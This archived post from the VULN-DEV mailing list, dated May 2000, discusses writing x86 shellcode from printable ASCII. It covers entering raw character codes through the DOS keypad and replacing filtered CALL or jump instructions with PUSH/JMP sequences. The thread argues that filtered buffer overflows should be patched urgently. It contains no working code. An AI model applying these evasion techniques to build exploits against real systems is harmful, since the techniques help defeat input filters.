Vulnerability Development mailing list archives
Re: Ascii-x86 was: Blind Remote Buffer Overflow
From: robert.collins () ITDOMAIN COM AU (Robert Collins)
Date: Thu, 4 May 2000 10:45:26 +1000
FWIW I recall in dos there was an ability to hold down alt and use the numeric keypad to enter charcodes directly in ie ALT-1,2,7 resulted in ASCII 127 being sent to the application.... Rob ----- Original Message ----- From: "Bluefish" <11a () GMX NET> To: <VULN-DEV () SECURITYFOCUS COM> Sent: Thursday, 4 May 2000 6:06 Subject: Ascii-x86 was: Blind Remote Buffer Overflow
I've written some code earlier in my life to be possible to use with the
ms-dos copy con: file.com -feature. My opion is that for most situations
its possible without too much work. (*never rely on this being 'hard' to
do!*)
To begin with, you are rarely limited to 7bit ascii (unless your shellcode
is being filtered). In fact you can often use a whole lot of 8bit
characters. That it cannot be printed is no gaurantee, e.g. you can
sometimes supply low ascii characters using the ctrl-button.
Additionally, regarding stuff being out of range! You have to keep in mind
that severall of the jump-codes can be replaced with synonmyns. If you
can't supply a call, your attacker might use PUSH/JMP or PUSH/PUSH/RET to
simulate it etc.
I doubt any developer actually rely on this being impossible, but I just
wanted to stress the fact that a fix for a overflowable but filtered
buffert should be as important to provide fast as an unfiltered. Because
what might seem hard to do might be hard to do - but some lunitic might
stay up for 36 hours only working with the problem and a few days later
the exploit might be widely available and activly exploited.
(possible scenarios could be the old XFree86 and the Win98-LFN buffert
overflows where the attacker is limited to printable characters. Or any
computer system where you can create executables but haven't a hexeditor
or compiler to create it using the common ways...)
Cheers,
B.F.
..:::::::::::::::::::::::::::::::::::::::::::::::::..
http://www.11a.nu || http://bluefish.11a.nu
eleventh alliance development & security team
Current thread:
- Re: Blind Remote Buffer Overflow, (continued)
- Re: Blind Remote Buffer Overflow Granquist, Lamont (May 01)
- Re: Blind Remote Buffer Overflow Reinier Heeres (May 02)
- Re: Blind Remote Buffer Overflow Matthew R. Potter (May 02)
- Re: Blind Remote Buffer Overflow Jani Ollikainen (May 02)
- Re: Blind Remote Buffer Overflow Granquist, Lamont (May 01)
- Re: Blind Remote Buffer Overflow Bluefish (May 01)
- Re: Blind Remote Buffer Overflow Marc (May 01)
- Re: Blind Remote Buffer Overflow Blue Boar (May 01)
- Re: Blind Remote Buffer Overflow matej (May 01)
- Re: Blind Remote Buffer Overflow Pavol Luptak (May 02)
- Ascii-x86 was: Blind Remote Buffer Overflow Bluefish (May 03)
- Re: Ascii-x86 was: Blind Remote Buffer Overflow Robert Collins (May 03)
- Re: Ascii-x86 was: Blind Remote Buffer Overflow Bill Weiss (May 03)
- firewall audit LEOW Chiun-Yi Jonathan (May 03)
- Re: firewall audit Ron DuFresne (May 03)
- Re: firewall audit antirez (May 04)
- Re: firewall audit Bennett Todd (May 04)
- Re: firewall audit Ron DuFresne (May 04)
- ethernet cards & promisc mode Security Team (May 03)
- Re: ethernet cards & promisc mode R (May 04)
- Info on the VBS/LoveLetter virus Roelof Temmingh (May 04)
- Re: ethernet cards & promisc mode Todd Garrison (May 04)